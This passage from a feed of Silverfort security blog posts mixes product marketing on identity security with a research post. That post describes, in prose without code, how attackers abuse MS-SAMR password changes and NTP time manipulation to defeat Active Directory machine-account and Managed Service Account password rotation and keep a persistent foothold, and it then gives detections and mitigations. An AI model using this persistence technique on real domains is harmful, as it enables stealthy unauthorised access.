across the organization are spinning up new AI tools and feeding them with sensitive information, without any real cybersecurity oversight. Outside of human users leveraging AI tools, agentic AI creates an even bigger security challenge. AI agents can’t be protected the same way as humans, but they also don’t behave like the old and predictable “machine identities” that vendors have been working to secure in recent years, meaning they need an entirely different type of protection. The key to securing AI agents lies in treating them as their own category of identity, with dedicated security controls that are designed for addressing their unique nature, and providing the necessary visibility, risk analysis, and access control.   Explosion of machine identities: Non-human identities (NHIs) like API keys, tokens and service accounts outnumber human users by at least 50:1 in large enterprises, and 80% of those identities have major security posture issues that leave organizations susceptible to common attack techniques. Further, according to our research, only 5. 7% of surveyed organizations believe they have good visibility into their non-human identities. Mapping, analyzing and protecting non-human identities is now a top priority for enterprises, and new technologies finally make it possible to achieve it at scale. Every identity requires the right level of privilege controls, not the IAM fallacy: While some vendors still try to stitch together IAM, IGA, and PAM and label it “identity security,” the market gradually realized that identity security requires a more modern approach, and that it’s very different from identity infrastructure. Identity security focuses on protecting identities from compromise, while identity infrastructure (or “IAM”) focuses on managing those identities and their lifecycle. Just like we no longer view cloud security as just a feature of the cloud infrastructure, or endpoint security as a feature of the endpoint itself, it’s becoming clear that identity security must be decoupled from the different silos of the IAM infrastructure to become truly effective. I explain this concept in-depth in a recent interview. Identity security – the next frontier It’s exciting to witness CyberArk, the company that pioneered the PAM category and played a big role in creating what is now the Identity Security market, get to such an impressive scale. I deeply respect what Udi, Matt and their team have built, and how they helped push the market forward. This acquisition makes it evident that identity security is finally taking the center stage, and there’s no slowing down. The more I speak with customers, the more it’s clear to me that identity security has become the top cybersecurity concern (alongside AI security, and those two are very connected). Now is the time to shift from siloed sub-categories and point solutions like PAM, ITDR, ISPM, NHI, MFA, and IGA to adopting true “Identity Security. ” It’s also time for Identity Security to fully decouple from the Identity Infrastructure and become a standalone layer that protects all the different Identity Infrastructure silos with a unified control plane. I am hopeful that Palo Alto Networks will help move the market in this direction and go beyond the traditional PAM market, to join us and others in creating a true Identity Security category and help customers address this critical need end to end. After seeing the exact same evolution in all the other major categories of cybersecurity (endpoint, network, cloud, data, etc. ), it’s time for Identity Security to evolve as well and stop lagging. At Silverfort, we’re proud to be leading this revolution and building the next generation of identity security platforms, which is already trusted by more than 1,000 enterprises including many of the Global Fortune 100. We look at CyberArk’s journey as an inspiration as we continue our own and are excited to see where identity security will go from here! See what our customers have to say about the power of modern identity security. --- - Published: 2025-08-04 - Modified: 2025-08-01 - URL: https://www.silverfort.com/blog/service-accounts-from-security-measure-to-silent-foothold/ Microsoft’s built-in password rotation mechanism is designed to protect on-premises Non-Human Identities (NHIs), such as machine accounts in Active Directory (AD). On the surface, it appears to be a strong defense—automated, scheduled, and structured to minimize security risks. This safeguard, however, can be subverted—allowing attackers to create a persistent foothold. An adversary can manipulate the rotation process across an entire environment or a specific machine account through a Man-in-the-Middle (MITM) attack. Attackers may also bypass the process entirely by compromising machine account passwords and changing them directly, thereby hijacking the rotation mechanism without interfering with network traffic. By either manipulating time synchronization or directly modifying passwords, attackers can disrupt or take control of the password rotation process. Time manipulation prevents scheduled rotations, while direct modification grants control over specific accounts—both enabling long-term persistence and evading detection. Security controls of on-premises NHIs Service accounts are non-human identities used to run applications, services, and automated tasks in an on-prem AD environment. These accounts often use static passwords that never change, posing significant security risks. Once compromised, attackers can use these credentials for: Theft & Lateral Movement: Utilizing the account's privileges to move laterally. Privilege Escalation: Gaining administrative access through elevated privileges. Long-Term Persistence: Maintaining access without detection or expiration. To mitigate such risks, password rotation ensures that account credentials change periodically. There are two primary types of accounts implementing password rotation: Machine Accounts: Represent domain-joined computers; password changes are managed by the local operating system. Managed Service Accounts (MSAs): Designed for services and applications; password rotation is enforced by the Domain Controller (DC). Account typePurposeWho manages rotation? Machine accountsComputer authentication within the domainLocal operation systemStandalone MSAsSingle-server application authenticationDomain Controller (DC)Group MSAs (gMSAs)Shared across multiple machinesDomain Controller (DC)Delegated MSAsExtension of gMSAs with delegated admin controlDomain Controller (DC) Understanding these differences is critical, as attackers exploit rotation mechanisms differently per account type. For instance, machine accounts can be hijacked via RPC methods such as MS-SAMR, while MSAs require manipulation of the DC rotation process. Attack vector 1: Disabling machine account password rotation In Active Directory, machine account password rotation is the responsibility of the client system, typically a domain-joined Windows host. The local operating system automatically rotates its machine account password every 30 days by default. To do so, it remotely communicates with the Domain Controller (DC) using the Security Account Manager Remote Protocol (MS-SAMR) over RPC. This protocol provides a set of administrative operations for managing user and computer accounts in Active Directory. One of the key functions used by the client to perform remote password updates is hSamrUnicodeChangePasswordUser2, which enables the authenticated client to change the password associated with its machine account in the directory. Machine account password rotation Mechanics of the attack However, this mechanism can be hijacked. Once an attacker gains access to the machine account, they can use MS-SAMR and specifically invoke hSamrUnicodeChangePasswordUser2 to directly modify the account password in Active Directory, without notifying or involving the original client. This severs the synchronization between the domain-joined machine and the DC, resulting in a one-sided trust relationship where the attacker controls the credentials and the legitimate host is locked out. Mechanics of the attack This breaks the trust between the machine and the DC. Each stores a copy of the password, and unauthorized modification leads to a mismatch. The AD object remains valid indefinitely, ensuring persistent access. Machine account disabling password rotation Once rotation is disabled, the account remains valid, even though no further password changes occur. The broken trust leaves the compromised machine unusable. Manipulating password rotation with time attacks To improve service credential security, Microsoft introduced standalone MSAs in Windows Server 2008 R2. MSAs rely on the DC for password management, but this centralization introduces new attack vectors. By manipulating system time on either the DC or service host, attackers can delay scheduled password changes. Since AD relies on timestamps, rolling the clock backwards postpones rotation and maintains access. How time affects password rotation Active Directory uses the PwdLastSet attribute to determine when an account's credentials were last rotated. This timestamp is critical for enforcing password expiration policies. Accurate time synchronization is vital for AD operations, including password policies and Kerberos authentication. The role of NTP in time synchronization Enterprises typically rely on external NTP for time accuracy. Windows uses NTP version 3 by default, which lacks message integrity protections. Windows time synchronization (w32tm) overview The Windows Time Service (w32tm) synchronizes domain time. In this case, the Domain Controller has two roles: Acts as a time server, distributing time to domain members. Syncs with external NTP servers as a time client. Key security parameters include: MaxPosPhaseCorrection and MaxAllowedPhaseOffset: Max time adjustments allowed per sync. Secure Time Seeding (STS): Uses TLS timestamps for tampering detection but is limited, especially post-TLS 1. 3. Disrupting password rotation via domain time manipulation MITM attacks between the DC and NTP source can gradually shift the DC’s time without detection. w32tm allows up to 48 hours of correction per sync, updated every 64 seconds. Attack vector 2: Time manipulation of MSA password rotation The attacker first manipulates the DC’s clock and then triggers password rotation through one of the following methods: Direct Request: A user or a service with privileges over the Managed Service Account. Natural Trigger: Allowing the Managed Service Account to reauthenticate naturally. When credentials are rotated while the system time is artificially set ahead, the PwdLastSet reflects that future timestamp. Reverting the clock back effectively delays the next scheduled rotation, bypassing enforcement. Key advantage All domain members synchronize with the DC, maintaining Kerberos authentication and minimizing detection. This synchronization masks the time manipulation from endpoint systems, ensuring stealth and continuity of service. Consequences of the attack These attacks can lead to long-term persistence within the environment by bypassing expiration controls via timestamp manipulation. Once an attacker rotates credentials with an altered time setting, subsequent rollbacks prevent further rotations, effectively nullifying security enforcement. The compromised account continues to function with a valid token, undetected. In addition to persistence, such time-based manipulation allows for evasion of password policies and potential privilege escalation. The rollback of system clocks may also lead to intermittent service failures and authentication issues, creating operational disruption and making detection more difficult. Mitigation strategies Organizations should implement secure time synchronization using authenticated NTP protocols such as NTPv4, which supports message integrity and authentication. Monitoring critical event logs can also help detect unusual behavior: Event ID 4616 (indicating time changes) and Event ID 4742 (indicating password changes for computer accounts) are particularly relevant. Additionally, implement monitoring for abnormal PwdLastSet patterns across service and machine accounts. These indicators can reveal attempts to manipulate rotation schedules or maintain stealth access. With these measures in place, the risk of stealthy, time-based attacks can be significantly reduced. --- - Published: 2025-07-31 - Modified: 2025-07-30 - URL: https://www.silverfort.com/blog/introducing-the-silverfort-mcp-server-where-ai-agents-meet-identity-security/ The future of identity-aware AI starts now AI agents are becoming integral to enterprise workflows, from analyzing risk to making dynamic access decisions in real time. But as these agents evolve, so must the systems they interact with. At Silverfort, we’ve taken a bold step forward in enabling secure, intelligent, and scalable identity integration with AI: introducing the Silverfort MCP Server.   MCP (Model Context Protocol) is a new open protocol that empowers AI systems to discover and interact with enterprise tools through standard interfaces. Originally developed by Anthropic, MCP is now becoming the de facto interface for AI agent integrations. With the launch of our own Silverfort-hosted MCP server, agents can now directly tap into the power of the Silverfort Identity Security Platform in real time, in a secure and contextual way. What is MCP and why it matters MCP enables AI agents to connect with external systems like databases, APIs, and services using a structured and standardized protocol. Rather than relying on brittle, hard-coded integrations, MCP allows for dynamic tool discovery, schema introspection, and natural language querying of live data. This makes AI agents more adaptable and maintainable, as well as easier to scale across diverse environments.   With MCP, AI agents like Claude, GitHub Copilot, and Cursor can access systems with context-aware intelligence. They are no longer guessing—they are asking, understanding, and acting. Why it matters MCP represents a fundamental shift in how AI systems interface with enterprise infrastructure. Until now, connecting an AI model to business systems required complex engineering work, custom code, and frequent updates as systems changed. MCP replaces that with a universal, language-model-friendly interface, removing friction from integration and accelerating deployment.   This shift unlocks a wide range of possibilities:  Increased Autonomy: Agents can independently explore available tools, understand their capabilities, and determine how to use them effectively without manual intervention.   Reduced Integration Overhead: Engineering teams no longer need to build and maintain interfaces for every AI tool. A single MCP-compliant layer can serve many agents.   More Intelligent Behavior: With structured access to real-time data and operations, agents can reason more accurately, make better decisions, and perform complex workflows safely.   Faster Innovation Cycles: As tools evolve or new systems are introduced, MCP enables plug-and-play compatibility, making it easier to experiment and iterate. Meet the Silverfort MCP Server To bring the power of MCP to enterprise identity security, we’ve launched the Silverfort MCP Server, hosted at https://raven. silverfort. io/mcp. We are one of the first identity security companies to embrace this new protocol, arming our customers with the tools they need to be efficient, yet secure. This provides a direct and secure conduit for AI agents to interact with Silverfort’s core capabilities, including:  Natural Language Policy Management  List, retrieve, update, and delete security policies  Execute advanced policy filtering and searches  Create dynamic workflows with AI copilots for policy changes  Intelligent Risk Assessment  Get detailed risk profiles for users, devices, and resources  Add or modify risk indicators with expiration and descriptions  Use conversational prompts to drive targeted risk investigations Streamable HTTP Architecture Under the hood, the Silverfort MCP Server is built on Streamable HTTP, the latest and most robust MCP transport protocol. This allows for remote, concurrent, and stateless communication between your AI agents and the Silverfort cloud. It is also optimized for reliability and scalability.   You do not need to deploy, configure, or host anything yourself. The Silverfort MCP Server runs entirely in the cloud, making it immediately accessible to authorized clients like Claude Desktop, GitHub Copilot, and any other tools supporting the MCP client pattern.   While many other MCP implementations require you to clone repositories, spin up local servers, and wrestle with tunneling or NAT traversal to get started, Silverfort eliminates all of that. Our hosted MCP endpoint is available out of the box, with no setup gymnastics required. How the Silverfort MCP Server works Secure by design: Built on Silverfort's Identity Security Platform Security is non-negotiable when it comes to giving AI agents access to enterprise resources. That is why we recently announced Silverfort Security for AI, a groundbreaking capability designed to govern and protect AI agents with the same rigor applied to human identities. In an upcoming release of the Silverfort MCP Server, organizations will be able to secure AI agents that interact with the MCP interface using Silverfort’s Security for AI framework. This will allow you to define which agents are permitted to access which tools, when, and under what conditions, bringing visibility and control to AI-powered access.   With Silverfort Security for AI, every action an AI agent takes through MCP will be:  Tied to a human owner for full accountability  Evaluated with least-privilege policies in real time  Logged immutably to ensure a verifiable audit trail  Governed by dynamic access controls that prevent misuse, overreach, or privilege escalation  By securing AI agents at the protocol layer, Silverfort empowers security teams to embrace AI without compromise.   A glimpse into the future While today’s MCP capabilities focus on Silverfort policy and risk operations, this is only the beginning. We plan to deepen the context available to AI agents and expand their tools. Think of the MCP interface as a browser for your AI agent, complete with its own plugins, environment, and permissions. As MCP adoption matures, we intend to let users enrich their agent’s context in increasingly intelligent and task-aware ways.   Imagine an agent that can:  Search and filter policies based on natural language queries rather than IDs or tags  Correlate policy configurations with live threat intelligence or recent auth activity  Use system prompts and tool schemas to analyze logs and highlight risky behaviors automatically  We aim to create a more fluid, expressive interface between AI agents and the identity fabric of the enterprise, one that feels as natural to use as asking a colleague for help.   Getting started with Silverfort's MCP Server Setting up your connection to the Silverfort MCP server is easy:  Install Claude Desktop or your preferred MCP-compatible client  Configure it to connect to https://raven. silverfort. io/mcp  Provide API credentials with appropriate Policy Management and Risk Assessment permissions  Ask questions like:  “What are the high-risk Silverfort policies active in my environment? ”  “Update policy pol_5678 to require MFA”  “Check the risk score for user cfo@company. com”  In minutes, your AI agents can begin securely reasoning over live identity data. A secure future for AI Agents AI is reshaping enterprise architecture, and identity is at the core of that transformation. The Silverfort MCP Server brings secure AI access to the heart of identity security, enabling safer innovation and faster decision-making. Start building your AI-augmented identity workflow today.   For questions or to request a demo, contact us at ecosystem@silverfort. com.   --- - Published: 2025-07-31 - Modified: 2025-08-01 - URL: https://www.silverfort.com/blog/how-to-mitigate-active-exploitation-of-microsoft-sharepoint-vulnerabilities/ A recent Microsoft security blog post highlights active exploitation of on-premises SharePoint vulnerabilities, where attackers are: Stealing credentials via SharePoint exploits Moving laterally using legacy protocols (NTLM, SMB) Abusing service accounts to escalate privileges Pivoting from on-prem to hybrid environments Patching isn’t always immediate—so how do Silverfort customers mitigate risk without waiting for updates? Silverfort’s identity-centric security platform provides a multilayered defense. In this blog post, we’ll explain how customers can protect their environment in five steps. 5 ways Silverfort protects against exploited SharePoint vulnerabilities Prevent lateral movement via legacy protocols Attackers use stolen credentials to move laterally via NTLM, SMB, RDP, PsExec—protocols where traditional MFA fails. Silverfort’s Solution:   Enforces MFA and access policies for legacy authentication Blocks stolen credentials from authenticating to file shares, databases, and domain controllers  MFA policy configuration Agentless protection for unpatchable systems Many SharePoint servers can’t tolerate agents or immediate patching. Silverfort’s Solution:   No agents required—integrates at the domain controller level Provides real-time visibility and enforcement without server-side changes  Conditional access for on-prem identities Attackers abuse on-prem AD accounts to pivot into hybrid environments. Silverfort’s Solution:   Extends Microsoft Entra AD-like Conditional Access to on-prem AD Blocks or requires MFA based on risk, location, time, or authentication method Access policy in Silverfort Service account protection SharePoint relies on privileged service accounts, which attackers target. Silverfort’s Solution:   Detects anomalous service account usage (e. g. , logins from new hosts) Enforces risk-based MFA for service accounts Gaining visibility into on-prem service accounts using the Silverfort Identity Security Platform Instant incident containment Microsoft warns of real-time exploitation—requiring rapid response. Silverfort’s Solution:   Blocks compromised accounts instantly across all AD-dependent systems Enforces quarantine policies without system modifications View incidents by type, severity, and other filters Silverfort vs. SharePoint exploitation: Key use cases Threat VectorSilverfort's MitigationLateral movement (NTLM, SMB)MFA and access policies for legacy protocolsService account abuseAnomaly detection plus risk-based MFA enforcementOn-prem identity misuseConditional access for ADAgentless defense neededDC-level enforcement, no server agents requiredRapid exploit containmentReal-time blocking at the authentication layer Next steps for at-risk organizations Audit SharePoint-related service accounts and admin logins. Apply risk-based policies for legacy protocols and sensitive accounts. Isolate compromised identities with zero trust enforcement. Leverage agentless protection to reduce blast radius—even before patching. Specific action plan Immediate (First 24 hours): Identify all SharePoint servers and dependent systems  Disable unnecessary legacy protocols (NTLMv1, WDigest)  Enable Silverfort monitoring for SharePoint-related accounts  Short-Term (First week): Implement MFA for all privileged SharePoint accounts  Restrict service account permissions  Configure geo-fencing for administrative access  Ongoing: Conduct regular access reviews  Test incident response playbooks  Monitor for new IOCs related to SharePoint exploits If your team uses Microsoft SharePoint and would like to learn more about how the capabilities mentioned in this post can protect your organization, request a demo today. --- - Published: 2025-07-30 - Modified: 2025-07-30 - URL: https://www.silverfort.com/blog/six-capabilities-every-identity-security-platform-must-have/ Identity has changed – in a world where business occurs across systems, time zones, and even between humans and non-humans, “identity” no longer means a single person logging into a single device in a single location. So why are we still approaching identity security as if it’s 2005? There must be a better way: a way that doesn’t consider a disjointed set of IAM, IGA, and PAM solutions the only option, but also considers where visibility, posture, protection, and threat analysis come into play. This is where identity security sits – going beyond authorization and access management and entering the realm of real-time prevention and detection and response.   According to research from the Securing the Identity Attack Surface report, “75% of detections are malware-free (a malware-free attack enables adversaries to operate under the radar and navigate seamlessly across endpoint and cloud domains). ” So yes, that saying “Attackers aren’t breaking in, they’re logging in” is true now more than ever, and there’s no turning back. Yet, while identity management doesn’t equate to identity security, IAM, compliance, and security teams are still in the position of needing to solve the same problems as back when “securing” identities meant governing access for one person, one device, one location. These unchanging challenges include solving how to:  Gain visibility into all identities, everywhere  Decrease operational and systems complexity  Improve processes and communication  Reduce the likelihood of security incidents (or at least contain them when they do occur)  This is why we’ve created the industry’s first Identity Security RFP checklist, a resource designed for identity, compliance, and security teams to evaluate vendors across six focus areas so they can ask the right questions that lead to selecting comprehensive, best-of-breed solutions. In this blog, we’ll loosely touch on these six core capabilities every identity security solution should have that, when satisfied, set up your organization for success regardless of environment, company size, or industry. To jump to the full Identity Security RFP Checklist, click here.   Capability #1: Enable universal Multi-factor Authentication (MFA) Most MFA solutions weren’t designed to cover everything – leaving behind a trail of unprotected systems, legacy protocols, and unmanaged interfaces. To add further complication, even where MFA is deployed, implementation is often complex – requiring agents or proxies – and managing multiple MFA tools across on-prem and cloud leads to redundant costs and inconsistent user experience. What organizations really need is universal MFA: the ability to extend protection to any resource, without modifying servers or applications, and without being locked to a single MFA provider. To get to the root of whether a solution provider offers universal MFA, key questions to ask include:  Does your solution extend MFA for systems that are more challenging, i. e. , command-line tools like PsExec to IT/OT infrastructure and custom apps?   Does your solution eliminate the need for agents or proxies with real-time or inline enforcement?   Can your solution provide MFA for all AD authentications, including NTLM, Kerberos, LDAP and LDAPS?   Does your solution extend Entra ID conditional access to AD-managed resources?   Does your solution integrate with Okta MFA?   Universal MFA from Silverfort  Capability #2: Enforce least privilege access  Once an attacker gains a foothold in systems, there’s often no way to stop lateral movement or privilege escalation without impacting core systems. Worse yet, most detection tools trigger only after the damage is done. What’s needed is inline enforcement at the point of authentication – deep within the identity infrastructure – so access can be blocked or challenged before a session is ever established. You need to be able to inspect every login attempt and continuously assess risk to enforce policy before a session ever begins. To get to the root of whether a solution provider enables your team to enforce least privilege access, key questions to ask include:  Does your solution have runtime access protection, offering preemptive, inline security controls at the authentication layer?   Can your solution prevent lateral movement and ransomware propagation as it’s happening?   Can your solution prevent PAM bypass by admins that log in directly to resources?   Authentication Firewall from Silverfort Capability #3: Protect privileged users and accounts  Privileged accounts continue to be one of the most abused entry points in breaches and insider threats. As Chief Identity Security Advisor (EMEA) Rob Ainscough notes in his webinar “Winning the Privileged Access Battle: From Firefighting to Field Control,” security teams typically turn to Privileged Access Management (PAM) solutions to prevent privileged account abuse. However, PAM solutions are difficult to scale, hard to ensure comprehensive coverage (especially where non-human identities such as service accounts are concerned), and it can take months or years just to protect a single account. Implementing PAM solutions takes away time and resources, yet still doesn’t provide comprehensive protection for all privileged accounts  What organizations need is an approach that reduces overhead, eliminates blind spots, and enforces least privilege dynamically. To get to the root of whether a solution provider protects privileged users and accounts, key questions to ask include:  Can your solution discover unknown privileged accounts?   Can your solution enforce least privilege access by restricting where accounts can be used through virtual fencing?   How does your solution prevent abuse of privileged accounts without disrupting legitimate workflows?   Privileged Access Security from Silverfort Capability #4: Discover, classify, and secure non-human identities such as service accounts  Non-human identities (NHIs) like service accounts and API keys outnumber human users by at least 50:1, and this divide continues to grow. Yet these identities often operate in the shadows. They’re difficult to discover, lack clear ownership, and are frequently granted excessive privileges. Modern identity security solutions need to provide complete visibility, active control, and scalable automation to manage NHIs at scale throughout their entire lifecycle – whether in the cloud or on-prem. To get to the root of whether a solution provider secures every NHI across cloud and on-prem, key questions to ask include:  Can your solution automatically discover and classify the following types of NHIs or programmable access credentials?   On-premises AD Service Accounts  OAuth or Access Tokens  API Keys  Certificates  Cloud IAM Roles  Service Principals  Cryptographic Keys  Can your solution view every authentication request that goes across Active Directory?   Does your solution automate protection of machine identities at scale using APIs, smart policy engines, and integrations such as CMDB or ticketing systems?   Can your solution provide identification and inventory of service accounts?   Can your solution facilitate the onboarding of service accounts to PAM?   NHI Security from Silverfort  Capability #5: Detect and block credential abuse, stop lateral movement, reduce false positives, and activate real-time response  According to the 2024 Verizon Data Breach Investigations Report, over 80% of breaches involve stolen or compromised credentials. Yet most detection and response tools weren’t built with identity in mind. Additionally, with traditional SIEM platforms it’s difficult to scale detections centered around identity, making it hard for SOC and IR teams to keep pace with evolving threats. Meanwhile, EDRs, XDRs, and CDRs only look at one piece of the puzzle, rather than offering a full picture of threats in the environment. To close those gaps, organizations need ITDR solutions that are identity-native and proactive. The right platform can identify threats at the heart of many large-scale breaches: lateral movement, privilege escalation, and suspicious access patterns. To get to the root of whether a solution provider can detect and respond to identity-driven threats in real time, key questions to ask include:  Does your solution deliver advanced identity-aware threat detection that inspects every access attempt across on-prem and cloud resources?   Can your solution go beyond passive detection to enable inline, real-time responses to malicious behavior?   Does your solution stop attackers with step-up authentication, access blocking, or forced re-authentication? And can it do so without halting user productivity?   If a breach occurs, can your solution contain the attack and ensure it doesn’t spread to additional resources?   Identity Threat Detection and Response from Silverfort (cloud-specific)  Capability #6: Improve identity security posture, proactively discover risks, and remediate weaknesses across hybrid environments  Weak points in the identity infrastructure – such as misconfigurations, outdated protocols, and excessive privileges – often go unnoticed until it’s too late, leading to account takeovers, lateral movement, and failed audits. Mapping and remediating risks at scale requires centralized visibility, comprehensive protection, and measurable results to improve and maintain identity hygiene.   To get to the root of whether a solution provider offers comprehensive identity security posture management (ISPM), key questions to ask include:  Can your solution provide a prioritized inventory of identity weaknesses within the organization?   Can your solution identify exposures associated with user activity and authentication requests, such as legacy protocols?   How do you identify service accounts that are dormant or no longer in use?   Can your platform detect users who are not in Domain Admins or other obvious groups, but still have admin-level permissions (shadow admins)?   Identity Security Posture Management from Silverfort (On-prem specific)  Download the Identity Security RFP Checklist  These questions are a small sample of what’s available in the full checklist – download it today to see the entire list for each of the six capabilities. The best part is that we also made the checklist interactive for you to customize it based on your team’s needs; once you download, you’ll have the option to get the list of questions in either a Google Sheet or Microsoft Excel format (whatever you prefer! ). It’s time to make identity security your strategic advantage. Based on our identity security experts’ curated list of questions to ask vendors, you’ll leave conversations with vendors with a clear picture of how you can connect the dots, make informed decisions, and stay ahead of threats. Interested in seeing how Silverfort satisfies the capabilities within the Identity Security RFP Checklist? Browse our platform now. --- - Published: 2025-07-14 - Modified: 2025-07-14 - URL: https://www.silverfort.com/blog/whats-the-difference-between-nhi-and-ai-agents-and-why-it-matters/ As AI capabilities evolve, the concepts of non-human identity (NHI) and AI agent are showing up increasingly in our daily work, especially in engineering, product, and system design contexts. You will see them in architecture diagrams, GitHub discussions, dev standups, or even baked into feature specs. An LLM-powered service might be labeled an “agent,” while a persistent user-facing system gets assigned an “identity. ” The problem? These terms are being used interchangeably when they describe fundamentally different things.   AI agents are AI/LLM-driven software systems. They can be powerful and autonomous. While they are tools, they are often not treated as identities, but they should be. They require security, oversight, and accountability, but not the projection of intent. NHIs, on the other hand, are machine or workload identities assigned to systems that persist, adapt, and present themselves in ways that resemble their identity. Treating them as agents risks ignoring their growing complexity and presence.   In this blog, we will clarify what these terms really mean, how they differ, and why the distinction matters, especially for teams building and integrating intelligent systems. What is an AI agent?   AI agents are systems powered by large language models (LLMs) that make decisions, manage tasks, and adapt dynamically to real-time inputs. These systems go beyond passive tools; they can adapt autonomously and in real time. AI agents don’t just respond; they take action. Unlike traditional systems that wait for user input, AI agents can initiate workflows, orchestrate across APIs, update databases, manage schedules, and even control physical devices. They are increasingly embedded into everything from developer tools and customer support systems to smart home platforms and product backends. For example, an AI agent might automatically escalate a support ticket based on sentiment analysis, trigger a deployment pipeline after code review, or adjust IoT device settings based on real-time sensor data.   Most AI agents typically share these three core traits:  Autonomy – they can operate without continuous human input Goal-directed behavior – they pursue defined objectives or tasks Environmental awareness – they process inputs and adjust behavior based on changing context These agents are powerful and can appear intelligent, but they are still software systems that are designed artifacts. They do not have identity, intent, or continuity of self. They may behave in ways that feel human-like, especially when interacting through natural language, but they remain fundamentally task-driven with programs built to serve specific functions. Understanding this distinction is critical. What is a non-human identity (NHI)?   Non-human identities (NHIs) are machine or workload identities used by software and systems to access resources. They are assigned to entities like APIs, service accounts, containers, workloads, and IoT devices. The purpose of NHIs is to allow automated systems and services to securely interact with other components in a distributed environment without human intervention. They enable tasks like data transfer, API calls, code deployment, workload orchestration, and service-to-service communication. NHIs are foundational to daily work operations, enabling infrastructure to scale, adapt, and function autonomously across dynamic, multi-cloud environments.   For example, an NHI might allow a CI/CD pipeline to push code to production, a Kubernetes pod to pull secrets from a vault, or an IoT sensor to report health metrics to a cloud dashboard.   At a high level, NHIs typically share three core characteristics:  Automation-first – they are designed to operate without manual intervention System-integrated – they are tightly embedded into apps, infrastructure, and platforms High-volume and short-lived – they are often created and destroyed programmatically at high speed and scale Despite their importance, NHIs are often overlooked in traditional identity systems, which were built for managing human users. They usually lack proper visibility, governance, or controls, making them a growing security risk. NHIs do not have intent or awareness; they are not intelligent. But they do hold privileges and access that, if compromised, can lead to major security risks. As NHIs continue to evolve, it is essential to understand their role and secure them effectively to maintain security and operational resilience.   Key differences between non-human identities and AI agents  AI agents are not NHIs, and they should not be treated as such. Grouping AI agents under the umbrella of NHIs is not only inaccurate; it can also create security risks.   NHIs like service accounts and tokens are predictable by design. They are static tools built to execute specific, predefined functions. Their behavior doesn’t change, and they never act without instruction. Because of this predictability, they can be modeled, monitored, and managed within traditional identity frameworks.   AI agents are fundamentally different. They are autonomous. They interpret intent, reason independently, and make decisions that evolve in real-time. Their actions are not scripted; they are autonomous. Unlike NHIs, AI agents can surprise you, and that’s not a side-effect—it’s a feature.   Treating AI agents as just another type of machine identity ignores this profound shift. It risks applying the wrong controls, overlooking new risk vectors, and ultimately undermining trust in systems designed to be intelligent. We need to stop forcing these entities into outdated identity approaches.   AI agents are a new identity type. They demand a new approach for lifecycle governance, behavioral monitoring, and real-time intervention. Recognizing this isn’t just a matter of knowledge, it’s a matter of security.   Here is a breakdown of the key differences: NHIs AI Agents What they are Digital credentials for systems or services Task-driven intelligent systems powered by AI Primary purpose Enable machines or workloads to authenticate and access resources Make decisions, act on data, and perform workflows Security focus Credential management, access controls, lifecycle Behavior monitoring, permissions, and context limits Identity lifecycle Configured like a user account: created, rotated, expired Not a standalone identity; built on top of NHIs Risks Exposed API keys, unused service accounts Autonomous overreach, overprivileged, prompt injection, and misuse Governance needs Least privilege, credential hygiene, and rotation Guardrails, explainability, and intent restriction Identity security alignment Enforce authentication, authorization, and visibility Enforce action scope, verification, and observability Why knowing the difference matters Understanding the difference between NHIs and AI agents is critical for securing your environment and users. If you treat both the same, you risk securing one layer while leaving the other wide open. You might lock down credentials but fail to monitor what the agent is doing with them. Or you might constrain AI behavior, but overlook that it is using a long-lived, over-permissioned NHI.   These are two distinct threat surfaces, and if you do not address them as distinct entities in your identity security strategy, you are leaving critical vulnerabilities and security risks unchecked. Now is the time to clearly understand the differences between NHIs and AI agents, because only with that visibility can you apply the right controls, close the right gaps, and stay ahead of the risks that are already here.   --- - Published: 2025-07-11 - Modified: 2025-07-11 - URL: https://www.silverfort.com/blog/non-human-identities-and-zero-trust-the-next-evolution-in-identity-security/ As enterprises push forward with digital transformation, a new and often overlooked attack surface has emerged: non-human identities (NHIs). NHIs are types of machine identities used by applications, workloads, containers, APIs, IoT devices, and more, and they far outnumber human users and are essential to how modern systems run.   NHIs drive automation and scalability but also introduce new layers of complexity and risks. Traditional identity tools, designed for human users, can’t keep up with the speed and scale of NHIs across hybrid and multi-cloud environments.   Securing these identities requires a strategic shift. Zero Trust offers that shift where identity becomes the new perimeter, and NHIs are governed, verified, and protected just like any human user. The rise of non-human identities According to IDC, 95% of all enterprise system-to-system communications are now conducted by NHIs. The proliferation of NHIs is not a coincidence; it's driven by three major technological shifts. Source: IDC First, enterprises are embracing cloud-native architectures, containerized workloads, and infrastructure as code (IaC). In these environments, NHIs are foundational. Every microservice, serverless function (like AWS Lambda or Azure Functions), or containerized workload needs its own identity to request resources or perform operations. For example, a single Kubernetes cluster might dynamically spin up thousands of pods, each with its own machine identity and scoped access to APIs or databases. These modern architectures dissolve traditional perimeters, making identity the new security boundary. Security must now follow the workload, whether it lives in a public cloud, on-premises, or in a transient container.   Second, organizations are racing to automate repetitive tasks through CI/CD pipelines, robotic process automation (RPA), and AI-driven workflows. These systems depend on NHIs to function. DevOps pipelines use service accounts to fetch code, deploy applications, and run integration tests. Chatbots and AI agents retrieve data via API calls, relying on access tokens and machine credentials. RPA bots log in to ERP systems to process invoices or update records, often with broad access. Each of these interactions is authenticated by a non-human identity and represents a potential attack surface.   Third, the Internet of Things (IoT) revolution has added billions of new endpoints, each one requiring authentication, encryption, and role-based access. Industrial IoT sensors in manufacturing facilities send telemetry to cloud services. Connected medical devices communicate patient data in real time. Smart city infrastructure coordinates lighting, traffic signals, and energy grids. Each device has a machine identity — often poorly secured, rarely rotated, and frequently outliving its original project or use case. A taxonomy of trust: Types of NHIs NHIs come in various forms, depending on their use case and environment. Service accounts are widely used by applications and scripts to access databases, cloud resources, or internal systems, and they often have excessive privileges. Machine certificates (such as TLS/SSL certificates) provide encrypted communications and authenticate servers and clients; however, expired or misconfigured certificates can cause catastrophic outages. Cloud-native roles (like AWS IAM roles, Azure Managed Identities, or Google Cloud service accounts) enable workloads to access resources securely. Meanwhile, API keys and tokens allow services to interact in SaaS or third-party integrations.   While these identity credentials are easy to create and deploy, they are hard to monitor and secure. The key challenge is not just managing a few machine identities, but doing so at scale — dynamically and securely across diverse platforms. Non-human identity security and risks: The silent epidemic Non-human identities (NHIs) such as service accounts, API keys, and machine-to-machine credentials are vital to modern IT operations, but they often fall outside the scope of traditional IAM and even Zero Trust frameworks. These identities are frequently created programmatically, used briefly, and then forgotten, leaving them unmanaged and vulnerable.   NIST SP 800-207 emphasizes the need to eliminate long-lived credentials in favor of short-lived, automatically expiring ones. This reduces the risk of credential theft by narrowing the attack window and ensures NHIs follow the same rigorous access controls as human users.   Unfortunately, credential hygiene remains a critical weakness—and attackers are exploiting it:  In the 2022 Twitter breach, hardcoded API keys were exposed in 